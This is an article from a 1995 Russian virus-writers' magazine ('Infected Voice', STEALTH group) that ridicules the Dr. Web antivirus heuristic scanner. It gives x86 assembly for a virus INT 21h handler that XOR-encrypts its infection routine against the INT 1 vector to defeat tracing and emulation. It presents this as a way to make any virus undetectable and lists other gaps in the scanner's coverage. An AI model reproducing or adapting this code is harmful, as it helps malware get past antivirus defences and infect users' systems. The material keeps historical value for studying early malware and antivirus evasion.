█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█  ▀					    ▀	       ██▀██▀██
█ STEALTH group	█░ █ █▀▄ █▀▀ ▄▀▀ ▄▀▀ ▀█▀ ▄▀▀ █▀█    ▌ █ ▄▀█ █ ▄▀▀ ▄▀▀  ██ ▀▀ ██
█   presents	█░ █ █ █ █▀  █▀  █    █  █▀  █ █    █ █ █ █ █ █  ▀█▀▀  █████ ██
█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█░ ▐ ▐ ▐ ▐   ▐▄▄ ▐▄▄  ▐  ▐▄▄ ▐▄▀     ▀█ ▀▄█ ▐ ▐▄▄ ▐▄▄  █████▄██
 ░░░░░░░░░░░░░░░░░                                                     JAN 1995

 INFECTED VOICE. Issue 4. January 1995. (C) STEALTH group, Kiev 148, Box 10.
 ---------------------------------------------------------------------------


	   WEB. ТАК ЛИ ОН СТРАШЕН, КАК АВТОР ЕГО МАЛЮЕТ?

     "Режим /S (эвристический анализ файлов) характеризуется тем,
что Dr. Web в этом режиме анализирует файлы и  системные  области
компьютера  (загрузочные  сектора)  на  заданном  устройстве    и
пытается  обнаружить  новые  или  неизвестные  ему   вирусы    по
характерным для вирусов кодовым последовательностям. Если таковые
будут найдены, то в этом случае выводится предупреждение  о  том,
что объект возможно инфицирован неизвестным  вирусом  (COM.Virus,
EXE.Virus,    COM.EXE.Virus,    COM.TSR.Virus,     EXE.TSR.Virus,
COM.EXE.TSR.Virus  или  Boot.Virus).  Данный   режим    позволяет
определять  неизвестные  вирусы,  даже,  в  сложношифруемых   или
полиморфных вирусах (уровней полиморфизма 1-5), код,  которых  от
копии к копии, может  не  совпадать  ни  на  один  байт!  Процент
определения неизвестных вирусов, при практическом тестировании на
коллекции  вирусов,  состоящих  из  1500  различных  экземпляров,
составил около 82 процентов!"
			      Игорь Данилов. Файл WEB.ME. v1.8.

Для того, чтобы обмануть имеющиеся у нас версии WEB ( до версии
2.0. включительно ), вовсе нет неоходимости писать "сложношифру-
емый или полиморфный ( уровней полиморфизма 1-5 )"  вирус, можно
написать и почти нешифрованый.

Я сделал это так: добавил в вирус (резидентный, заражающий COM и
EXE),который успешно детектировался, маленькую хитрость,а именно
 - немного изменил обработчик 21h:

;------------------------------
;	Обработчик 21h.
;------------------------------
; Функции, при вызове которых
; происходит заражение.
;------------------------------
	CMP  AH,03Dh
	JE   CHECK
	CMP  AH,043h
	JE   CHECK
	CMP  AH,04Bh
	JE   CHECK
	CMP  AH,056h
	JE   CHECK
;-----------------------------------------------------
;	Дальше идут другие обрабатываемые функции.
;-----------------------------------------------------

CHECK:
	CALL XOR_IT
_XOR_:
;-----------------------------------------------------
;  Вот здесь находится часть вируса, отвечающая за
;  установку 24h, чтение из файла-жертвы и записи
;  в него, снятие и восстановление атрибутов и т.д.
;  После компиляции необходимо все байты между метками
;  _XOR_ и ___ проксорить с 0CFh (код IRET). 
;-----------------------------------------------------
	CALL XOR_IT		; зашифруем обратно
___:
	JMP  SHORT NO_RET	; Передача управления невирусному
				; обработчику 21h.

XOR_IT  PROC NEAR
	PUSH SI
	PUSH DS
	PUSH AX
	PUSH CX
	XOR  SI,SI
	MOV  DS,SI
	LDS  SI,DWORD PTR DS:[0004h]	; DS:SI - адрес 1 прерывания...
	LODSB
	MOV  SI,MYCHECK			; MYCHECK - Смещение метки CHECK + 3.
	MOV  CX,OFFSET ___-OFFSET _XOR_
COME_ON:
	XOR  BYTE PTR CS:[SI],AL	; Если в AL не IRET, то есть что-то
					; кто-то хочет трассировать, то скорее
					; всего его постигнет неудача...
	INC  SI
	LOOP COME_ON
	POP  CX
	POP  AX
	POP  DS
	POP  SI
	RET
XOR_IT  ENDP

	Данный метод применим для любых вирусов.(естественно, если не сдирать
данный вариант-RCE для бутовых и ...нерезидентных вирусов).

	
	Еще несколько особенностей WEB'а -
	--  не реагирует на работу с файлами через FCB
	--  не знает, что из DOS'а торчит большая SFT, через которую тоже
	    распространяется зараза (насморк)	

	Принципиально не эмулирует работу с портами и не дает изменить 
	память вне своего полигона. Данная особенность эвристического 
	анализатора позволяет заявить о его неспособности...
	И будет знать об этом spIDer-MAN, или не будет - ничего от этого не
	изменится, и прийдется переходить на "лечение" Khizhnyak и Vienna.
	Процесс уже пошел! Кстати, интересно, откуда в его паутину попадают
	подобные раритеты ? Кто из вас еще помнит живую Vienny ? Если досто-
	почтенный WEBer	желает, мы можем прислать экземпляр отсутсвующей 
	648-й и кучу его штаммов...(на момент выхода журнала 648й уже появил-
	ся, от души поздравляем автора WEB'а !)

	Файл WEB.YOU (руководство программиста) является неотъемлемой 
	частью комплекта поставки WEB в форме КАК ЕСТЬ... 


  DDDDDDD     RRRRRRR        WW        WWW        WW   EEEEEEEEE   BBBBBBB
  DDDDDDDD    RRRRRRRR        WW       WWWW       WW   EEEEEEEEE   BBBBBBBB
  DD     DD   RR     RR        WW      WW WW      WW   EE          BB     BB
  DD     DD   RR     RR         WW     WW  WW     WW   EE          BB     BB
  DD     DD   RRRRRRRR           WW    WW   WW    WW   EEEEEEEEE   BBBBBBBB
  DD     DD   RRRRRRR             WW   WW    WW   WW   EEEEEEEEE   BBBBBBBB
  DD     DD   RR  RR               WW  WW     WW  WW   EE          BB     BB
  DD     DD   RR   RR     ..        WW WW      WW WW   EE          BB     BB
  DDDDDDDD    RR    RR   ....        WWWW       WWWW   EEEEEEEEE   BBBBBBBB
  DDDDDDD     RR     RR   ..          WWW        WWW   EEEEEEEEE   BBBBBBB

                      Copyright (c) Игорь Данилов 1992-94


        Программа  Dr. Web  является  коммерческим   программным
продуктом. Если Вам понравилась данная  программа  и Вы  хотите, 
чтобы  Dr. Web и в дальнейшем  радовал (веселил) Вас  -  станьте
зарегистрированным пользователем.

                      антивирусный отдел АО "ДиалогНаука", Москва
       тел./факс (095) 135-6253, 938-2970, 137-0150 (10.00-18.00)
                               BBS (095) 938-2856 (14400/V.32bis)
                                         E-mail: lyu@dials.msk.su
                                               FidoNet: 2:5020/69

                 Связь с автором:
                                        Данилов Игорь Анатольевич
                                тел.(812) 298-86-24 (10.00-18.00)
                                           E-mail: id@sald.spb.su
                                           FidoNet:  2:5020/69.14
		 
P.S. 	Автор статьи очень рад успехам Игоря Данилова в Английском
	правописании и будет рад пополнить его словарный запас не
	только словом "Maverick" (с буквой С).